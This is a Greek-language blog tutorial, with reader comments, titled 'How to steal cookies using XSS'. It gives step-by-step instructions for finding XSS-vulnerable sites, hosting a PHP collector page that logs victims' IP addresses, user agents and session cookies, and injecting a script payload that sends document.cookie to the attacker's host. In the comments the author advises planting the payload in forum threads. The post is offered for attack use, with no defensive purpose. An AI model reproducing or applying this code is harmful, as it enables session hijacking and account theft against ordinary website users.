Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS

Ένας τρόπος για να μπορέσουμε να βρούμε τους κωδικούς χρηστών από κάποια ιστοσελίδα είναι μέσω Cross Site Scripting (XSS).Θα πρέπει φυσικά η ιστοσελίδα να είναι vulnerable σε αυτού τους είδους τις επιθέσεις.Για να βρούμε ποιές ιστοσελίδες παρουσιάζουν αυτού του είδους την αδυναμία αρκεί να χρησιμοποιήσουμε το πρόγραμμα Acunetix Vulnerability Scanner.

Ποιά εργαλεία θα χρειαστούμε?

Μόλις βρούμε τον στόχο μας τότε θα χρειαστούμε τα ακόλουθα:

  1. Έναν λογαριασμό σε ένα hosting site
  2. 2 σελίδες με κώδικα php
  3. Την ιστοσελίδα που είναι vulnerable

Μπορούμε να βρούμε αρκετά hosting sites που υποστηρίζουν php όπως:

www.000webhost.com

http://www.free-webhosts.com/free-php-webhosting.php

Δημιουργούμε λοιπόν έναν λογαριασμό σε κάποιο free hosting site για να ανεβάσουμε τις php σελίδες μας.Η μία σελίδα θα έχει το όνομα vb.php και θα περιέχει τον κώδικα:

<head>
<meta http-equiv=»Content-Language» content=»it»>
<title>Cookies Stealther</title>
</head>

<body bgcolor=»#C0C0C0″>

<p align=»center»><font color=»#FF0000″>COOKIES STEALTHER</font></p>
<p align=»center»><font face=»Arial» color=»#FF0000″>By R00T[ATI]</font></p>
<p align=»left»>&nbsp;</p>

</body>

και η άλλη σελίδα θα έχει το όνομα documents.php και θα περιέχει τον εξής κώδικα:

<?php

$ip = $_SERVER[‘REMOTE_ADDR’];
$referer = $_SERVER[‘HTTP_REFERER’];
$agent = $_SERVER[‘HTTP_USER_AGENT’];

$data = $_GET[c];

$time = date(«Y-m-d G:i:s A»);
$text = «<br><br>».$time.» = «.$ip.»<br><br>User Agent: «.$agent.»<br>Referer:  «.$referer.»<br>Session: «.$data.»<br><br><br>»;

$file = fopen(‘vb.php’ , ‘a’);
fwrite($file,$text);
fclose($file);
header(«Location:
http://www.google.com«);

?>

Η σελίδα vb.php χρησιμοποιείται για να εμφανίσει σε εμάς τα cookies που έχει κλέψει και άλλες πληροφορίες ενώ η σελίδα documents.php χρησιμοποιείται για να πάρει πληροφορίες από τα πιθανά θύματα όπως η IP τους διεύθυνση κτλ.

Τώρα στην ιστοσελίδα που είναι vulnerable σε XSS θα πρέπει να εισάγουμε το ακόλουθο script:

http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=<script>document.location=»http://www.example-of-hosting/documents.php?c=»+document.cookie;</script>

Τα μέλη που θα πέσουν θύματα αυτής της επίθεσης θα κατευθυνούν στο site της google (μπορούμε στο αρχείο documents.php να βάλουμε όποια άλλη σελίδα θέλουμε) και εμείς θα μπορούμε να δούμε τα cookies στο αρχείο vb.php

5 Σχόλια to “Πώς να κλέψουμε τα cookies χρησιμοποιώντας XSS”

  1. Δεν πολλυκατάλαβα τι ακριβώς κανουν όλα αυτα. Έφτιαξα τα php scripts… τωρα θα πρεπει να φτιάξω και μια ιστοσελίδα που κάποις θα κάνει log in έτσι ώστε εγώ να δω τα passwords του?

  2. Όχι θα πρέπει να βρεις την σελίδα που είναι vulnerable σε XSS επιθέσεις και να εισάγεις τον κώδικα.Π.χ αν μιλάμε για κάποιο φόρουμ,κάνεις ένα thread καινούργιο και κάνεις αντιγραφή τον κώδικα.Τώρα το πως θα βρεις κάποια ιστοσελίδα αδύναμη σε XSS επιθέσεις μπορείς να χρησιμοποιήσεις κάποιον vulnerability scanner όπως Acunetix και να δοκιμάζεις ιστοσελίδες για να δεις σε ποιά θα εντοπίσει την αδυναμία σε XSS.

  3. To ερωτημα μου ειναι:
    Aφού έχεις τα cookies του , τι σου χρηιμευουν οι server vars ($_SERVER[‘REMOTE_ADDR’]….etc) ?

  4. Το έκανα και δεν έπιασε.Εξήγησε λίγο τι πρέπει να αντικαταστήσω σε αυτό εδώ http://vulnerable-site.com/vulnerable_page.php?vulnerable_method=document.location=”http://www.example-of-hosting/documents.php?c=”+document.cookie;

    Εκεί που λέει vulnerable_page.php ειναι αναγκαίο να υπάρχει php αρχειο στη σελιδα αυτή?Επισης,στο «example-oof-hosting…» τι εννοείς?

  5. Τι ακριβως εννοείς στο τελευταιο βημα?

Σχολιάστε

Εισάγετε τα παρακάτω στοιχεία ή επιλέξτε ένα εικονίδιο για να συνδεθείτε:

Λογότυπο WordPress.com

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό WordPress.com. Αποσύνδεση / Αλλαγή )

Φωτογραφία Twitter

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Twitter. Αποσύνδεση / Αλλαγή )

Φωτογραφία Facebook

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Facebook. Αποσύνδεση / Αλλαγή )

Φωτογραφία Google+

Σχολιάζετε χρησιμοποιώντας τον λογαριασμό Google+. Αποσύνδεση / Αλλαγή )

Σύνδεση με %s

Αρέσει σε %d bloggers: